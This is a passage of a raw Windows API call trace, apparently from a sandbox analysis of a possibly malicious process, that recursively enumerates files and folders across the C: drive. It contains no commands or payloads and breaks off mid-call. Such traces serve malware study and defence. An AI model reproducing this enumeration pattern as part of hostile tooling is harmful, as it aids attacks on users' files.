lpFindFileData=0x69c790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0158.481] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.481] lstrlenW (lpString="Logs") returned 4 [0158.484] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.484] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\Logs\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677b30 [0158.587] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9c5a0a89, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.588] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.588] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x542c8aac, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0xafe5f7a, ftLastWriteTime.dwHighDateTime=0x1d3273e, nFileSizeHigh=0x0, nFileSizeLow=0xa6b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="downlevel_2017_09_07_02_02_39_766.log", cAlternateFileName="DOWNLE~1.LOG")) returned 1 [0158.588] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.588] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0158.591] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xcc) returned 0x679f30 [0158.591] SetEvent (hEvent=0x274) returned 1 [0158.591] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x973abb0f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x973abb0f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1774, dwReserved0=0x0, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log", cAlternateFileName="OOBE_2~1.LOG")) returned 1 [0158.591] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.591] lstrlenW (lpString="oobe_2017_09_07_03_08_57_737.log") returned 32 [0158.592] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2) returned 0x66d3a8 [0158.592] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 1 [0158.592] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.592] lstrlenW (lpString="PartnerSetupCompleteResult.log") returned 30 [0158.593] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x670048 [0158.593] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c5a0a89, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x9c5a0a89, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xbb3747bd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log", cAlternateFileName="PARTNE~1.LOG")) returned 0 [0158.593] FindClose (in: hFindFile=0x677b30 | out: hFindFile=0x677b30) returned 1 [0158.594] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.594] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69c790 | out: lpFindFileData=0x69c790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0158.594] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.594] lstrlenW (lpString="SafeOS") returned 6 [0158.594] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.594] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677b30 [0158.605] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.605] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.605] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0158.605] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.605] lstrlenW (lpString="GetCurrentOOBE.dll") returned 18 [0158.606] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0158.606] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.606] lstrlenW (lpString="GetCurrentRollback.ini") returned 22 [0158.606] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0158.606] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.606] lstrlenW (lpString="PartnerSetupComplete.cmd") returned 24 [0158.606] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0158.606] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.606] lstrlenW (lpString="preoobe.cmd") returned 11 [0158.606] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0158.606] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.606] lstrlenW (lpString="SetupComplete.cmd") returned 17 [0158.607] FindNextFileW (in: hFindFile=0x677b30, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0158.607] FindClose (in: hFindFile=0x677b30 | out: hFindFile=0x677b30) returned 1 [0158.608] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.608] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69c790 | out: lpFindFileData=0x69c790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0158.608] FindClose (in: hFindFile=0x678130 | out: hFindFile=0x678130) returned 1 [0158.608] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69c790 | out: hHeap=0x660000) returned 1 [0158.608] FindNextFileW (in: hFindFile=0x6780f0, lpFindFileData=0x69c538 | out: lpFindFileData=0x69c538*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0158.608] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.608] lstrlenW (lpString="$Recycle.Bin") returned 12 [0158.609] FindNextFileW (in: hFindFile=0x6780f0, lpFindFileData=0x69c538 | out: lpFindFileData=0x69c538*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0158.609] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.609] lstrlenW (lpString="$WINRE_BACKUP_PARTITION.MARKER") returned 30 [0158.609] FindNextFileW (in: hFindFile=0x6780f0, lpFindFileData=0x69c538 | out: lpFindFileData=0x69c538*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0158.609] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.609] lstrlenW (lpString="588bce7c90097ed212") returned 18 [0158.609] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d798 [0158.609] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*", lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677df0 [0158.614] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.617] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.617] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1025", cAlternateFileName="")) returned 1 [0158.617] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.617] lstrlenW (lpString="1025") returned 4 [0158.618] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.618] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x678130 [0158.619] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.619] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.619] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.619] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.619] lstrlenW (lpString="eula.rtf") returned 8 [0158.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x66d1d0 [0158.619] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.619] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.619] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x66ff00 [0158.620] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.620] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.620] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.620] FindNextFileW (in: hFindFile=0x678130, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.620] FindClose (in: hFindFile=0x678130 | out: hFindFile=0x678130) returned 1 [0158.620] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.620] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1028", cAlternateFileName="")) returned 1 [0158.620] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.620] lstrlenW (lpString="1028") returned 4 [0158.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x250) returned 0x69d9f0 [0158.620] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x677cb0 [0158.621] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0158.622] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.622] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0158.622] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.622] lstrlenW (lpString="eula.rtf") returned 8 [0158.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x66c898 [0158.622] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0158.622] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.622] lstrlenW (lpString="LocalizedData.xml") returned 17 [0158.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb2) returned 0x66d988 [0158.622] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0158.622] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.623] lstrlenW (lpString="SetupResources.dll") returned 18 [0158.623] FindNextFileW (in: hFindFile=0x677cb0, lpFindFileData=0x69d9f0 | out: lpFindFileData=0x69d9f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0158.623] FindClose (in: hFindFile=0x677cb0 | out: hFindFile=0x677cb0) returned 1 [0158.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69d9f0 | out: hHeap=0x660000) returned 1 [0158.623] FindNextFileW (in: hFindFile=0x677df0, lpFindFileData=0x69d798 | out: lpFindFileData=0x69d798*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1029", cAlternateFileName="")) returned 1 [0158.623] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0x0) returned 0x102 [0158.623] lstrlenW 